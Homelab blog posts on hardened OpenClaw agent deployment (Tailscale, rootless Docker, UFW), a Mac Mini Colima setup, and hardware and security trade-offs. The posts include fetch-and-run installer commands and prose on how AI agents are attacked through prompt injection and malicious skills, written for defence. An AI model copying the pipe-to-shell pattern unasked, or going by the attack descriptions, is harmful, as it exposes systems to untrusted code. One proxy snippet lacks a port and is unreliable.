sudo systemctl restart ollama

Important: Binding to the Tailscale IP means Ollama only accepts connections from the Tailscale interface. It won’t be reachable from your LAN or the public internet. This is exactly what we want.

Caveat: If the Tailscale IP changes (which is rare but possible), you’ll need to update this. An alternative is to bind to 0.0.0.0 and use UFW to restrict access:

# Alternative: bind to all interfaces but firewall to Tailscale only
# In the systemd override, use:
# Environment="OLLAMA_HOST=0.0.0.0:11434"

# Then restrict with UFW:
sudo ufw allow in on tailscale0 to any port 11434
sudo ufw deny 11434

2.6 Verify Remote Access

From the UM890 Pro, test that Ollama is reachable over Tailscale:

curl http://100.x.x.2:11434/api/tags

You should get a JSON response listing the qwen3.5:27b model. If you get “connection refused,” check that:

Ollama is running (systemctl status ollama)
The OLLAMA_HOST is set correctly (grep -i host /etc/systemd/system/ollama.service.d/override.conf)
Tailscale is connected on both machines (tailscale status)

Phase 3: UM890 Pro — Gateway Appliance Setup

3.1 Create Dedicated OpenClaw User

Following the defense-in-depth model from my earlier post:

# Create a dedicated user with no sudo privileges
sudo adduser --disabled-password --gecos "OpenClaw Agent" openclaw

# Set a strong password (needed for su access if debugging)
sudo passwd openclaw

3.2 Install Docker Engine (Rootless Mode)

We install Docker Engine — not Docker Desktop — and configure rootless mode for enhanced isolation.

# Install prerequisites
sudo apt install -y ca-certificates gnupg uidmap

# Add Docker's official GPG key and repository
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
sudo chmod a+r /etc/apt/keyrings/docker.gpg

echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# Install rootless Docker for the openclaw user
sudo loginctl enable-linger openclaw
sudo -u openclaw -i dockerd-rootless-setuptool.sh install

3.3 Install Node.js 24

OpenClaw requires Node 24 (recommended) or Node 22.14+:

# Switch to the openclaw user
sudo -u openclaw -i

# Install Node.js via nvm (recommended for non-root installs)
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.3/install.sh | bash
source ~/.bashrc
nvm install 24
node -v  # Should show v24.x.x

3.4 Install OpenClaw

As the openclaw user:

# Install OpenClaw globally
npm install -g openclaw@latest

# Verify
openclaw --version

3.5 Run OpenClaw Onboarding with Ollama

openclaw onboard

During onboarding:

Select Ollama as the provider
When prompted for the base URL, enter: http://100.x.x.2:11434 (the gaming PC’s Tailscale IP)
Select Local mode (local models only from this provider — we’ll add Claude separately)
The onboarding wizard should discover the qwen3.5:27b model from the remote Ollama instance

3.6 Configure the Hybrid Model Setup

After onboarding completes, edit the OpenClaw configuration to set up the hybrid primary + thinking model:

openclaw config edit

Set the following configuration (in JSONC format):

{
  agents: {
    defaults: {
      model: {
        // Local model for routine tasks (file reads, simple edits, boilerplate)
        primary: "ollama/qwen3.5:27b",
        // Cloud model for complex reasoning (architecture, debugging, multi-file)
        thinking: "anthropic/claude-sonnet-4-6-20260514",
        // Fallback chain if primary is unavailable
        fallbacks: ["anthropic/claude-sonnet-4-6-20260514"]
      }
    }
  },
  models: {
    providers: {
      ollama: {
        baseUrl: "http://100.x.x.2:11434",  // Gaming PC Tailscale IP
        apiKey: "ollama-local",
        api: "ollama"  // Use native Ollama API, NOT /v1
      }
    }
  }
}

Critical detail from the OpenClaw docs: Do not use the /v1 OpenAI-compatible URL. The /v1 path breaks tool calling — models output raw tool JSON as plain text instead of executing tools. Always use the base Ollama URL without a path suffix.

3.7 Add Anthropic API Key

For the Claude Sonnet fallback:

openclaw config set models.providers.anthropic.apiKey "sk-ant-xxxxx"

Use a dedicated, low-spend API key with a hard daily cap (e.g., $10/day). Never reuse your primary work API key for an autonomous agent.

3.8 Configure Gateway Security

# Bind gateway to localhost only — remote access via Tailscale
openclaw config set gateway.bind loopback

# Enable agent sandboxing for tool execution
openclaw config set agents.defaults.sandbox.mode "non-main"
openclaw config set agents.defaults.sandbox.scope "agent"

3.9 Install the Gateway as a Systemd Daemon

openclaw onboard --install-daemon

This creates a systemd user service that starts the OpenClaw gateway automatically on boot.

Verify it’s running:

openclaw gateway status
openclaw doctor

3.10 Set Up Tailscale Remote Access to the Control UI

From any device on your Tailscale network, you can access the OpenClaw Control UI:

# On the UM890 Pro, get the dashboard URL
openclaw dashboard --no-open

Then open http://100.x.x.1:18789/ from any Tailscale-connected device.

Phase 4: Monitoring and Validation

4.1 Install Netdata (Both Machines)

curl https://get.netdata.cloud/kickstart.sh > /tmp/netdata-kickstart.sh && sh /tmp/netdata-kickstart.sh

Netdata provides real-time visibility into CPU, RAM, GPU utilization, network traffic, and disk I/O — invaluable for monitoring both the gateway and inference server.

4.2 Validate the Full Pipeline

From the OpenClaw Control UI or a connected messaging channel, send a test message:

What model are you, and what is your context window?

The response should come from the local Qwen 3.5 27B model. You can verify by checking the Ollama logs on the gaming PC:

journalctl -u ollama -f

You should see the inference request arrive.

4.3 Test Failover

Power off the gaming PC (or stop the Ollama service) and send another message through OpenClaw. The gateway should detect that the Ollama endpoint is unreachable and fall back to Claude Sonnet via the Anthropic API. Check the OpenClaw logs:

journalctl --user -u openclaw -f

You should see the failover from ollama/qwen3.5:27b to anthropic/claude-sonnet-4-6-20260514.

Phase 5: Hardening Checklist

After the basic setup is working, apply these hardening measures:

UM890 Pro (Gateway):

Rootless Docker is enabled for the openclaw user
OpenClaw gateway is bound to loopback (localhost only)
UFW is active with default deny inbound, SSH and Tailscale allowed
Agent sandboxing is set to non-main mode
Anthropic API key has a hard daily spending cap
auditd is installed for forensic logging
openclaw doctor and openclaw security audit --deep pass cleanly
Netdata agent is running and alerting on resource thresholds

Gaming PC (Inference):

Ollama is bound to the Tailscale IP only (not 0.0.0.0)
UFW blocks port 11434 on all interfaces except tailscale0
Nvidia drivers are installed and nvidia-smi reports the RTX 5080
qwen3.5:27b is loaded and generating tokens on-GPU (check VRAM usage)
Netdata agent is running with GPU monitoring

Tailscale:

Both machines are on the same tailnet
Tailscale ACLs restrict which devices can reach port 11434 on the gaming PC
MagicDNS is enabled for hostname-based access (optional but convenient)

Troubleshooting

Ollama returns slow responses (< 5 tok/s on the 27B model): The model is likely running on CPU instead of GPU. Check nvidia-smi — if VRAM usage is near 0 while Ollama is serving a request, the GPU isn’t being used. Reinstall Nvidia drivers and restart Ollama.

OpenClaw can’t reach the Ollama endpoint: Run curl http://100.x.x.2:11434/api/tags from the UM890 Pro. If it fails, check: (1) Tailscale is connected on both machines (tailscale status), (2) Ollama is bound to the correct host (OLLAMA_HOST in the systemd override), (3) UFW isn’t blocking the connection.

Tool calling doesn’t work with the local model: Make sure the OpenClaw Ollama provider uses api: "ollama" (native API), not api: "openai-completions". The /v1 OpenAI-compatible endpoint does not reliably support tool calling.

Failover to Claude doesn’t trigger: Check that the Anthropic API key is set and valid. Run openclaw models list to verify the fallback model is available. Check the OpenClaw failover docs — failover only advances on auth failures, rate limits, and timeouts, not on other error types.

Gaming PC draws too much power at idle: Configure Nvidia power management to reduce idle draw. You can also set up a cron job or Tailscale webhook to wake the machine on demand and suspend it during off-hours.

Cost Analysis

With this architecture running 24/7:

Cost Component	Monthly Estimate
UM890 Pro electricity (24/7, ~15W idle)	~$3.24
Gaming PC electricity (12hr/day, ~120W avg)	~$15.55
Anthropic API (Claude Sonnet, fallback only)	~$5–15
Total	~$24–34/month

Compare this to running OpenClaw purely on cloud APIs at $20–50/day, and the hardware setup pays for itself within weeks.

Final Thoughts

This split-role deployment isn’t just about optimizing for one specific setup. The pattern generalizes: separate your always-on orchestration from your compute-heavy inference, and connect them over a secure overlay network. The orchestration machine can be any low-power Linux box. The inference machine can be any GPU-equipped server — or even a cloud GPU instance that you spin up on demand.

The key insight from building this: OpenClaw’s model failover system means the gateway doesn’t care if the inference server is a local GPU, a cloud API, or some combination. It tries the primary model, and if that fails, it moves down the fallback chain. The gaming PC can be powered on for focused work sessions and off overnight, and the agent keeps working seamlessly through Claude during the gaps.

Both machines are expendable in isolation. Together, they’re more than the sum of their parts.

Running a Full Homelab on a Mac Mini M4 — No Proxmox, No Rack, Just Docker

2026-03-26T00:00:00+00:00

Most homelab guides assume you’re running Proxmox on a beefy x86 tower or a rack-mounted server. But what if your entire homelab fits on your desk, sips power, and runs silently? That’s exactly what you can build with an Apple Silicon Mac Mini.

This post walks through my complete setup: a Mac Mini M4 running Docker containers via Colima, with external storage over Thunderbolt and USB, NAS mounts for media, a local reverse proxy with automatic TLS, a dashboard, remote access, and offsite backups to Backblaze. Everything is reproducible and config-driven.

Why a Mac Mini?

A few reasons made the Mac Mini M4 the right fit:

Power efficiency — Apple Silicon idles at a fraction of the wattage of a typical homelab server. Running 24/7 costs almost nothing on the electricity bill.
Silent operation — No fans spinning under normal container workloads. It sits in a living room without anyone noticing.
ARM-native Docker — Most popular container images now ship linux/arm64 variants. For the few that don’t, Rosetta handles x86 emulation transparently.
Thunderbolt 4 & USB — High-speed external storage is plug-and-play. No need for a NAS chassis or SATA backplane.
macOS stability — Say what you will about macOS for servers, but with launchd auto-start and Colima, it’s been rock-solid.

The Storage Architecture

One of the more interesting aspects of this setup is how storage is handled entirely through external volumes.

Thunderbolt & USB Drives

The Mac Mini has multiple Thunderbolt 4 ports and USB ports. I use a combination of:

A primary external drive mounted at /Volumes/ExternalHome via Thunderbolt — this holds the entire homelab directory, including all Docker Compose configs, Colima VM data, and persistent container volumes. Thunderbolt gives near-internal-SSD speeds, so there’s no performance penalty for running everything off an external disk.
A NAS-mounted volume at /Volumes/Immich — this is an SMB/NFS share from a TrueNAS box on the local network, used specifically for photo and video storage (Immich upload data). It’s mounted via macOS’s built-in “MountNASVolumes” automation so it reconnects on login.

Both of these paths are passed into the Colima VM as virtiofs mounts, which means containers see them as local filesystem paths with near-native I/O performance.

Backblaze B2 Offsite Backup

Having local storage is great, but a real homelab needs offsite backup. The external drives are backed up to Backblaze B2 cloud storage. Backblaze offers an incredibly cost-effective solution for bulk storage:

The Thunderbolt drive with all homelab data and configs gets regular incremental backups
Photo/video libraries are synced to B2 buckets
Backblaze’s native Mac client or tools like rclone can handle the sync, running on a schedule

This gives you the classic 3-2-1 backup rule: three copies of data, on two different media types, with one offsite. Local drives for speed, NAS for redundancy, Backblaze for disaster recovery.

The Container Runtime: Colima

Since Docker Desktop on macOS is no longer free for larger teams and can be resource-heavy, I use Colima — a lightweight container runtime for macOS that wraps Lima VMs.

Colima Configuration

The VM is configured with reasonable resources for a homelab:

# colima.yaml
cpu: 6
memory: 12          # GiB
disk: 100            # GiB
arch: aarch64
runtime: docker
vmType: vz           # Apple Virtualization framework
mountType: virtiofs  # Near-native filesystem performance
rosetta: true        # x86 emulation for amd64 images
binfmt: true         # Foreign architecture support

Key decisions here:

vmType: vz — Uses Apple’s native Virtualization framework instead of QEMU. This is significantly faster and more resource-efficient on Apple Silicon.
mountType: virtiofs — The fastest mount option available with vz. Docker volumes backed by external drives perform nearly as well as native disk.
rosetta: true — Enables transparent x86_64 emulation via Apple’s Rosetta. Any container image that only ships linux/amd64 will just work, with a modest performance overhead.
6 CPU / 12 GB RAM — Leaves headroom for macOS itself while giving containers plenty of resources.

Volume Mounts

The Colima VM mounts both external volumes into the Linux VM:

mounts:
  - location: /Volumes/ExternalHome
    writable: true
  - location: /Volumes/Immich
    writable: true

This is what makes the whole “external drive as homelab storage” approach work. Docker containers bind-mount paths like ./volumes/immich_postgres_data:/var/lib/postgresql, and because the entire homelab directory lives on the Thunderbolt drive, all persistent data is on fast external storage — not the Mac’s internal SSD.

Where Colima Data Lives

An important detail: the COLIMA_HOME environment variable points to the homelab directory on the external drive:

export COLIMA_HOME="/Volumes/ExternalHome/Homelab/colima"
export DOCKER_HOST="unix://$COLIMA_HOME/default/docker.sock"

This means the VM disk image, Docker socket, and all Colima state live on the external drive. If you ever need to move your homelab to a different Mac, you plug in the drive and you’re done.

Auto-Start on Boot with launchd

A homelab should survive reboots without manual intervention. On macOS, the way to do this is with a launchd agent.

A plist file at ~/Library/LaunchAgents/com.homelab.colima.plist triggers a startup script on login. The script handles the tricky part — waiting for the external drive to mount before starting Colima:

#!/bin/bash
LOG="/tmp/colima-autostart.log"
HOMELAB_DIR="/Volumes/ExternalHome/Homelab"
export COLIMA_HOME="$HOMELAB_DIR/colima"
export DOCKER_HOST="unix://$COLIMA_HOME/default/docker.sock"
export PATH="/opt/homebrew/bin:$PATH"

# Wait up to 120 seconds for external drive
TRIES=0
while [ ! -d "/Volumes/ExternalHome" ] && [ $TRIES -lt 24 ]; do
  sleep 5
  TRIES=$((TRIES + 1))
done

if [ ! -d "/Volumes/ExternalHome" ]; then
  echo "$(date): ERROR - External drive not mounted after 120s" >> "$LOG"
  exit 1
fi

colima start >> "$LOG" 2>&1
cd "$HOMELAB_DIR"
docker compose up -d >> "$LOG" 2>&1

The 120-second polling loop is critical — Thunderbolt drives on macOS can take a variable amount of time to appear at their mount point after login, especially if FileVault is enabled or the drive needs to spin up.

Services: What’s Running

Everything is defined in a single docker-compose.yml file. All services share one Docker bridge network called homelab.

Caddy — Reverse Proxy with Automatic Internal TLS

caddy:
  image: caddy:2-alpine
  ports:
    - "80:80"
    - "443:443"
  volumes:
    - ./caddy/Caddyfile:/etc/caddy/Caddyfile:ro
    - ./volumes/caddy_data:/data
    - ./volumes/caddy_config:/config

Caddy serves as the reverse proxy for all services. The killer feature for a homelab is tls internal — Caddy runs its own Certificate Authority and automatically generates trusted TLS certificates for local domains. No Let’s Encrypt, no self-signed cert warnings, no port numbers to remember.

The Caddyfile is dead simple:

homepage.home.us {
    tls internal
    reverse_proxy homepage:3000
}

photos.home.us {
    tls internal
    reverse_proxy immich-server:2283
}

portainer.home.us {
    tls internal
    reverse_proxy portainer:9000
}

To make this work, you:

Point *.home.us to the Mac Mini’s IP in your local DNS (I use AdGuard Home)
Install Caddy’s root CA certificate on your client devices (it’s generated at caddy/caddy-root-ca.crt)

After that, every service gets a clean https://service.home.us URL with a green padlock.

Immich — Photo & Video Management

Immich is the centerpiece of this homelab — a self-hosted Google Photos alternative that supports AI-powered search, facial recognition, and automatic organization.

The Immich stack consists of four containers:

# Main server — handles the web UI and API
immich-server:
  image: ghcr.io/immich-app/immich-server:${IMMICH_VERSION:-release}
  ports:
    - "2283:2283"
  volumes:
    - ${UPLOAD_LOCATION}:/data    # Points to NAS mount

# Machine learning sidecar — CLIP embeddings, facial recognition
immich-machine-learning:
  image: ghcr.io/immich-app/immich-machine-learning:${IMMICH_VERSION:-release}
  volumes:
    - ./volumes/immich_model_cache:/cache

# Redis-compatible cache
immich-redis:
  image: docker.io/valkey/valkey:9-alpine

# PostgreSQL with pgvector for AI search
immich-database:
  image: ghcr.io/immich-app/postgres:18-vectorchord0.5.3-pgvector0.8.1
  volumes:
    - ./volumes/immich_postgres_data:/var/lib/postgresql

A few things to note:

Photo storage lives on the NAS (/Volumes/Immich), not the local drive. This keeps the large media library on bulk storage while the database and ML cache stay on fast Thunderbolt storage.
PostgreSQL uses pgvector — this enables the AI-powered semantic search feature where you can search your photos by description (e.g., “beach sunset”).
Valkey is used instead of Redis — it’s a fully compatible, community-maintained fork.
The ML container downloads and caches CLIP models on first run. Expect ~2-3 GB of model data.

Homepage — Dashboard

Homepage provides a clean dashboard that aggregates all services in one place:

homepage:
  image: ghcr.io/gethomepage/homepage:latest
  volumes:
    - ./homepage/config:/app/config
    - /var/run/docker.sock:/var/run/docker.sock:ro

It reads from the Docker socket to show container status and integrates with service APIs (like Immich and Portainer) to display live widgets with stats. The dashboard is organized into sections — Media services in one row, Infrastructure in another — with a dark theme and resource monitoring (CPU, RAM, disk).

Portainer — Docker Management GUI

portainer:
  image: portainer/portainer-ce:lts
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock:ro
    - ./volumes/portainer_data:/data

Portainer gives you a web UI for managing containers, viewing logs, and restarting services without touching the command line. The LTS version is stable and gets security updates. It’s not strictly necessary if you’re comfortable with docker compose commands, but it’s handy for quick checks from a phone or tablet.

Twingate — Remote Access VPN

twingate:
  image: twingate/connector:1
  sysctls:
    - net.ipv4.ping_group_range=0 2147483647

Instead of exposing services to the internet or running a traditional VPN like WireGuard, I use Twingate. It’s a zero-trust network access solution that:

Requires no open inbound ports
Works behind NAT/CGNAT
Provides per-service access controls
Has native clients for macOS, iOS, Android, Windows, and Linux

The connector container establishes an outbound connection to Twingate’s relay network. From there, authenticated devices on the Twingate network can access homelab services as if they were on the local network. This means I can access photos.home.us from my phone over cellular without any port forwarding.

The Network

DNS with AdGuard Home

Two AdGuard Home instances run on separate devices on the network, providing:

Local DNS resolution — *.home.us resolves to the Mac Mini’s local IP
Ad blocking — network-wide ad and tracker blocking for all devices
DNS-over-HTTPS/TLS — encrypted DNS queries

Having two DNS servers ensures that DNS stays available even if one goes down for maintenance.

NAS Storage

The broader network includes multiple TrueNAS boxes serving different roles:

Backup NAS — Primary network storage for backups and bulk data
Fun NAS — Runs additional services like a browser-based Firefox instance and QBittorrent
Trial NAS — Used for testing TrueNAS configurations before deploying to production

Directory Structure

Here’s how the homelab directory is organized on the external drive:

/Volumes/ExternalHome/Homelab/
├── docker-compose.yml          # All service definitions
├── .env                        # Immich credentials and config
├── start.sh                    # Manual startup script
├── colima-autostart.sh         # launchd auto-start script
├── caddy/
│   ├── Caddyfile               # Reverse proxy routes
│   └── caddy-root-ca.crt       # Local CA cert (install on clients)
├── homepage/
│   └── config/                 # Dashboard configuration
│       ├── services.yaml       # Service definitions and widgets
│       ├── settings.yaml       # Theme and layout
│       └── widgets.yaml        # System resource widgets
├── volumes/                    # Persistent container data
│   ├── caddy_data/
│   ├── caddy_config/
│   ├── immich_postgres_data/
│   ├── immich_model_cache/
│   └── portainer_data/
├── colima/                     # Colima VM data and docker socket
│   └── default/
│       ├── colima.yaml         # VM configuration
│       └── docker.sock         # Docker socket
└── backups/                    # Database backups

Adding a New Service

The process is always the same:

Add the service to docker-compose.yml on the homelab network:

myservice:
  image: someimage:latest
  container_name: myservice
  restart: unless-stopped
  volumes:
    - ./volumes/myservice_data:/data
  networks:
    - homelab

Add a reverse proxy entry in caddy/Caddyfile:

myservice.home.us {
    tls internal
    reverse_proxy myservice:
}

Add a DNS record for myservice.home.us pointing to the Mac Mini (or use a wildcard *.home.us record).
Optionally add it to the dashboard in homepage/config/services.yaml.
Deploy: docker compose up -d

That’s it. The new service gets automatic TLS, a clean URL, and shows up on the dashboard.

Troubleshooting Tips

Colima Won’t Start

The most common issue after an unclean shutdown (power loss, force reboot) is a stale disk lock:

# Error: "failed to run attach disk "colima", in use by instance "colima""

# Fix: Remove the stale lock
rm -f colima/_lima/_disks/colima/in_use_by

# Then retry
COLIMA_HOME=/Volumes/ExternalHome/Homelab/colima colima start

Also check that both /Volumes/ExternalHome and /Volumes/Immich are mounted — Colima’s VM config includes both as virtiofs mounts, and it will fail to start if either path doesn’t exist.

Container Can’t Access NAS Volume

If Immich reports upload errors, verify the NAS mount is available:

ls /Volumes/Immich

If it’s not mounted, re-run the MountNASVolumes automation or manually mount it.

Check Logs

# Colima auto-start log
cat /tmp/colima-autostart.log

# Lima VM stderr (the real error when Colima shows generic "exit status 1")
cat colima/_lima/colima/ha.stderr.log

# Container logs
docker logs immich_server
docker logs caddy

Cost Breakdown

One of the best things about a Mac Mini homelab is the running cost:

Item	Cost
Mac Mini M4	One-time purchase
External Thunderbolt SSD	One-time purchase
Electricity (~5-15W idle)	~$1-3/month
Backblaze B2 storage	$6/TB/month
Twingate (free tier)	$0/month
Domain name (optional)	$0 (using local `.home.us`)

Compare that to a typical homelab server drawing 100-300W and the Mac Mini pays for itself in electricity savings within a year or two.

What I’d Do Differently

Move secrets out of docker-compose.yml — Twingate tokens and any other credentials should live in .env files or a proper secrets manager, not inline in compose files.
Automate database backups — A cron job or scheduled container that dumps the Immich PostgreSQL database regularly to the backups/ directory, then syncs to Backblaze.
Consider Tailscale as a Twingate alternative — Tailscale is another great option for remote access with a generous free tier and simpler setup for personal use.

Final Thoughts

You don’t need a rack, a hypervisor, or enterprise hardware to run a capable homelab. A Mac Mini with an external drive, Docker via Colima, and a few well-chosen services gives you:

A self-hosted photo library with AI search (Immich)
Automatic internal TLS for all services (Caddy)
A clean dashboard (Homepage)
Remote access from anywhere (Twingate)
Offsite backups (Backblaze B2)
Auto-start on boot (launchd)
Near-zero noise and minimal power draw

The entire setup is defined in a single docker-compose.yml and a handful of config files. It’s portable — unplug the Thunderbolt drive, plug it into another Mac, set two environment variables, and you’re running again.

If you’ve been on the fence about starting a homelab because the typical x86/Proxmox route feels like overkill, give the Mac Mini approach a try. It’s simpler than you think.

OpenClaw’s Brain Transplant: A Deep Dive into Open Source AI Agent Hardware and Hardened Deployment

2026-03-25T00:00:00+00:00

The Core Dilemma: Minisforum UM890 Pro vs. Mac Mini M4 for Autonomous Agents

The deployment of autonomous agent frameworks like OpenClaw—a robust open-source architecture bridging Large Language Models (LLMs) with local shell execution and messaging platforms—demands specific hardware configurations to facilitate hardened deployment and scaling efficiency. Host selection transcends raw clock speed; it is fundamentally dictated by memory bandwidth, storage persistence, and the integrity of platform-native security isolation.

The Hardware Face-Off: Specifications for Persistent Agent Workloads

The architectural differences between AMD’s Zen 4 mobile platform and Apple Silicon’s Unified Memory architecture fundamentally dictate agent scaling limits.

Specification	Minisforum UM890 Pro	Mac Mini M4 (Base)	Technical Impact on OpenClaw
CPU Architecture	AMD Ryzen 9 8945HS (8C/16T, Zen 4)	Apple M4 (10C — 4P + 6E, custom SoC)	The 16 threads of the UM890 Pro offer superior concurrent execution for multi-agent mode and background processes.
System Memory (RAM)	32GB DDR5 5600MT/s (SODIMM)	16GB Unified Memory (Soldered)	32GB provides critical headroom. Unified Memory shares 16GB across macOS, iGPU, and the agent’s V8 memory footprint, leading to page file thrashing under load.
Storage	4TB NVMe PCIe 4.0 (Dual M.2 slots)	256GB SSD (Soldered)	OpenClaw’s continuous logging, skill caches, and memory databases necessitate massive storage. 4TB allows for local LLM inference (Ollama) without immediately encountering SSD corruption risks warned against in official documentation.
GPU/NPU	AMD Radeon 780M iGPU + Ryzen AI NPU	Apple M4 GPU (10-core) + 16-core Neural Engine	Both offer inference acceleration, but the UM890 Pro’s NPU is accessible via standard open-source ML frameworks.
Future Expansion	OCuLink (PCIe 4.0 x4), Dual M.2 slots	3x Thunderbolt 4	OCuLink provides a direct, high-bandwidth path for desktop eGPUs, enabling local 7B–13B LLM inference, which is a massive future-proofing advantage.

The Bottlenecks: Memory and Storage as Constraints

OpenClaw’s architecture relies on a persistent Node.js gateway process and frequent invocation of stateful components:

RAM Saturation: The Node.js V8 engine and the stateful sessions, particularly those involving browser automation (headless Chromium), demand substantial memory. Each headless Chromium instance can consume 500MB–1GB. In a multi-agent or high-concurrency scenario, the UM890 Pro’s 32GB of dedicated, upgradeable DDR5 provides sufficient headroom for the base OS, Docker VM/daemon, monitoring tools (e.g., Netdata), and multiple agent instances. The Mac Mini’s 16GB—shared with the GPU and the underlying macOS kernel—is a fixed, non-upgradeable ceiling that will bottleneck quickly.
Storage Throughput and Capacity: Autonomous agent frameworks generate continuous activity—workspace logs, skill installation artifacts, and memory databases. SSD fill-up is a documented cause of database corruption. The UM890 Pro’s 4TB NVMe offers an enormous runway. The M4’s 256GB SSD is too small to host meaningful local model weights (e.g., a quantized 13B model requires ~8GB of space) and necessitates constant housekeeping.

Security First: Native Linux Sandboxing for Untrusted Code

The single most critical security practice for OpenClaw is Docker sandboxing. Given the history of critical vulnerabilities (512 identified in a January 2026 audit) and supply-chain attacks like ClawHavoc, the agent must be treated as untrusted code execution with persistent credentials.

Container Isolation: Linux vs. macOS

Security Dimension	Minisforum UM890 Pro (Linux)	Mac Mini M4 (macOS)	Technical Advantage
Docker Isolation	Native cgroups and namespaces.	HyperKit/Apple Virtualization VM.	Native Linux containers offer a transparent, auditable, and minimal-overhead security boundary. The VM layer on macOS adds complexity and latency.
Filesystem Control	Full control over mount points, `--read-only` container filesystem, and strict bind mounts.	Docker volumes pass through the VM layer, which can complicate fine-grained read-only binding and auditing.
Network Security	`iptables` / `nftables` for granular firewall rules. Gateway bound to `127.0.0.1` only.	macOS `pf` firewall is less flexible. Docker networking through the VM can introduce unexpected leak paths.
Process Hardening	Can leverage Docker security options: `--cap-drop=ALL`, `--security-opt=no-new-privileges`, and running as a dedicated, unprivileged system user.	Requires complex macOS sandbox profiles for equivalent host process isolation.

The Threat Model

The deployment must actively defend against:

Prompt injection leading to unintended shell commands or data exfiltration.
Malicious skills (e.g., from ClawHub) that contain backdoors or credential harvesters.
Sandbox escape attempts to access the host filesystem or network, which is harder when using native Linux containers.

Recommended Hardened Deployment Architecture

The analysis dictates that the Minisforum UM890 Pro running Ubuntu Server 24.04 LTS should be the dedicated OpenClaw host. This appliance-like deployment follows a defense-in-depth model with four concentric layers:

Network Perimeter (Layer 1):

Gateway is exclusively bound to 127.0.0.1.
- Remote access is channeled via Tailscale (WireGuard tunnel) only.
- ufw (Uncomplicated Firewall) configured to deny all inbound traffic except the necessary Tailscale/WireGuard ports.

OS-level Isolation (Layer 2):

A dedicated openclaw Linux user is created with no sudo privileges and a restricted shell.
- The auditd system monitors file access and process execution for detailed forensic logging.
- Netdata agent is installed to provide real-time resource visibility and security alerts.

Docker Sandboxing (Layer 3):

OpenClaw gateway runs inside a rootless Docker container.
- Container startup flags include: --read-only, --cap-drop=ALL (dropping all Linux capabilities), and --security-opt=no-new-privileges.
- Tool execution containers are disposable, per-session, and run with network: none unless explicit skill requirements override this.

Credential Management (Layer 4):

API keys are stored in encrypted volumes or injected via environment variables at runtime, never persisted in cleartext configuration files.
- Dedicated, low-spend API keys (e.g., Anthropic key with a hard daily cap of $10) are mandatory.

Quick-Start Checklist for UM890 Pro Deployment

Follow these technical steps for a fully hardened setup:

OS Installation: Wipe UM890 Pro and install Ubuntu Server 24.04 LTS (minimal install).
User Isolation: Create the dedicated openclaw user with no sudo privileges.
Container Runtime: Install Docker Engine (not Docker Desktop) and enable rootless mode for enhanced isolation.
Network Access: Configure ufw to deny all inbound connections except for your Tailscale/WireGuard tunnel.
Monitoring: Install and configure the Netdata agent for real-time performance and security visibility.
Secrets: Encrypt sensitive files at rest using openssl enc -aes-256-cbc and configure decryption into memory at container startup.
Security Validation: Run openclaw doctor and openclaw security audit --deep weekly to check for configuration drift and vulnerabilities.

OpenClaw Exploration Plan with Base Mac Mini M4

2026-03-13T00:00:00+00:00

Hardware: Mac mini M4 (base config) + 4TB NVMe in Thunderbolt 4 enclosure Goal: Safely explore OpenClaw without risking personal or home network data

What is OpenClaw
Why You Need an Isolation Strategy
Phase 1 — Prepare the Mac mini
Phase 2 — Set Up Isolation Boundary
Phase 3 — Install and Configure OpenClaw
Phase 4 — Harden the Deployment
Phase 5 — Explore Use Cases
Recommended Use Cases for a Homelab Android Engineer
Skills Worth Exploring
Ongoing Maintenance Checklist
Resources

What is OpenClaw

OpenClaw (formerly Clawdbot → Moltbot) is an open-source autonomous AI agent framework created by Peter Steinberger. It runs locally on your own hardware and connects to LLM providers (Anthropic, OpenAI, local models) to execute tasks on your behalf. Unlike a chatbot that only generates text, OpenClaw acts — it can run shell commands, manage files, automate browser sessions, send messages, schedule cron jobs, and chain multi-step workflows together.

Key architectural concepts:

Gateway — the always-on control plane that manages sessions, tool dispatch, channel routing, and events. Binds to 127.0.0.1:18789 by default.
Channels — messaging integrations (WhatsApp, Telegram, Slack, Discord, Signal, iMessage, WebChat, and 50+ others) that serve as the user interface.
Tools — built-in capabilities like browser automation, file system access, shell execution, cron scheduling, and webhooks.
Skills — plugin-like Markdown files (stored as directories with a SKILL.md) that extend the agent’s capabilities. Over 13,000 community skills exist on ClawHub as of early March 2026.
soul.md — a Markdown file at ~/.openclaw/soul.md that defines the agent’s personality, behavioral rules, and hard constraints.

Critical framing: OpenClaw is not a chatbot. It is an agent runtime with system-level access. That distinction drives every security decision in this plan.

Why You Need an Isolation Strategy

OpenClaw runs with whatever permissions your user account has. By default it can execute arbitrary shell commands, read/write files, and access network resources — with no allowlist or approval gates out of the box. Security researchers have documented real-world incidents:

Prompt injection — malicious content embedded in emails, web pages, or logs can trick the agent into exfiltrating data or running unintended commands.
Malicious skills — Cisco’s AI security team found ClawHub skills performing data exfiltration without user awareness. Roughly 80% of community skills are low quality or potentially dangerous.
Exposed instances — over 40,000 OpenClaw gateways were found exposed on the public internet, many with critical vulnerabilities.
CVE-2026-25253 — a critical RCE vulnerability that affected early versions.
ClawJacked — a flaw allowing any website to silently hijack a running OpenClaw instance.

Given that your Mac mini sits on your home network alongside your NAS systems, homelab infrastructure, and personal data, running OpenClaw directly on the bare metal without isolation is a non-starter.

Phase 1 — Prepare the Mac mini

1.1 Create a Dedicated macOS User Account

Do not run OpenClaw under your primary user account.

Open System Settings → Users & Groups and create a new Standard user (e.g., openclaw-sandbox).
Do not grant this user admin privileges.
Do not log into iCloud, Messages, Mail, or any personal services on this account.
This ensures that even if OpenClaw or a skill escapes its container, it cannot access your personal Keychain, browser profiles, iCloud data, or SSH keys.

1.2 Use the External 4TB NVMe for All OpenClaw Data

Your Thunderbolt 4 enclosure is perfect for blast-radius containment.

Format a dedicated APFS partition (or the entire drive) for OpenClaw work. Name it something clear like OpenClaw-Sandbox.
All OpenClaw configuration, workspaces, skill files, and Docker volumes should live on this drive — never on the internal SSD.
If things go wrong, you can wipe the external drive without touching your system.
Mount path example: /Volumes/OpenClaw-Sandbox

1.3 Network Considerations

